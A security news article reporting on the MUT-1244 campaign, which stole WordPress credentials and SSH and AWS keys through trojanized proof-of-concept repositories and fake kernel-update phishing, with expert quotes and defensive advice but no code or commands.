Researchers at Datadog Security Labs have uncovered a year-long, large-scale cybercrime campaign by a threat actor tracked as MUT-1244. This operation, which blends social engineering and technical exploitation, has resulted in the theft of more than 390,000 WordPress credentials.
Additionally, sensitive SSH private keys and AWS access keys were exfiltrated from compromised systems, implicating a diverse victim pool of red teamers, penetration testers, security researchers, and other malicious actors.
Tactics, techniques, and procedures (TTPs)
MUT-1244's methods demonstrate a sophisticated understanding of its targets. The operation's cornerstone was the deployment of a trojanized WordPress credentials checker, a tool frequently used by security professionals and cybercriminals. Victims unwittingly infected their systems while attempting to test credentials, a critical functionality for both legitimate and illicit purposes.
But this was only the beginning. The second stage of the attack chain relied on:
-
Trojanized GitHub repositories: Dozens of fake repositories were seeded with malicious proof-of-concept (PoC) exploits. These PoCs targeted known vulnerabilities, luring ethical hackers and adversaries searching for exploit code.
Jason Soroko, Senior Fellow at Sectigo, explained: "Attackers set up dozens of GitHub repositories with fake proof-of-concept exploits. Victims who were security pros, red teamers, and threat actors unknowingly installed malicious second-stage payloads that stole credentials and keys. Simultaneously, a phishing campaign tricked targets into installing a fake kernel update. These trojanized repos looked legitimate, often appearing in trusted threat intelligence feeds. By downloading and running this code, victims essentially infected themselves."
-
Phishing campaigns: Victims received emails urging them to install a fake kernel upgrade disguised as a CPU microcode update. Once executed, this upgrade triggered commands to install the malware payload, compromising the victim's system.
Stephen Kowski, Field CTO at SlashNext, emphasized: "The attack used multiple methods to compromise victims. Trojanized GitHub repositories containing malicious code posed as legitimate proof-of-concept exploits, luring security professionals to download and run them. A phishing campaign also tricked targets into installing malware disguised as a CPU update, widening the attack surface."
These dual approaches highlight the campaign's ingenuity: leveraging curiosity and operational needs to compromise targets.
Implications for the cybersecurity community
This campaign represents a striking example of the risks inherent in the offensive security space. By targeting security professionals—including red teamers and researchers—MUT-1244 gained access to tools, techniques, and credentials that could facilitate additional attacks or provide insights into sensitive operations. Additionally, the theft of SSH private keys and AWS access keys underscores the campaign’s broader implications for enterprise security.
Casey Ellis, Founder and Advisor at Bugcrowd, commented: "Targeting red-teamers and security researchers through fake POCs is a troll technique as old as security research itself. However, as this attack demonstrates, it can also be an effective approach to watering-hole attacks. This is a good reminder for those who provide offensive security services that they themselves are part of an exploitable supply chain, and that malicious attackers know this."
The threat of fake PoC exploits
The use of malicious PoC exploits is not new but remains a potent strategy for targeting cybersecurity professionals. By exploiting the desire for cutting-edge exploit code, adversaries can compromise even the most security-conscious individuals. In this case, the fake repositories and phishing emails undermined the trust essential to open-source and collaborative security efforts.
Stephen Kowski added: "This attack targeted the software development pipeline by corrupting widely-used libraries and tools. The malicious code could spread to numerous downstream applications and systems once installed. The use of popular code-sharing platforms like GitHub as an attack vector shows the critical need for robust verification processes and real-time threat detection in development workflows."
What organizations can do
-
Verify the source of tools: Ensure PoC exploits and other tools come from verified and trusted sources. Be cautious of unfamiliar GitHub repositories.
-
Educate security teams: Train red teams and researchers to recognize phishing attempts, especially those exploiting operational needs like kernel upgrades.
-
Implement strong key management: Employ robust safeguards for SSH and AWS keys, including limiting their use and implementing key rotation policies.
-
Monitor for indicators of compromise (IoCs): Organizations should look for unusual activities related to WordPress, GitHub, or cloud access patterns.
-
Adopt advanced threat detection tools: As Kowski suggests, "Organizations benefit from automated security scanning solutions that analyze dependencies and identify potential threats before they spread through the software supply chain."
MUT-1244's campaign demonstrates how advanced threat actors continue to exploit trust and operational needs in cybersecurity. For security professionals, vigilance remains key—not only in protecting their organizations but also in safeguarding their own tools and methodologies. As this incident highlights, the line between attacker and victim can be perilously thin.
Follow SecureWorld News for more stories related to cybersecurity.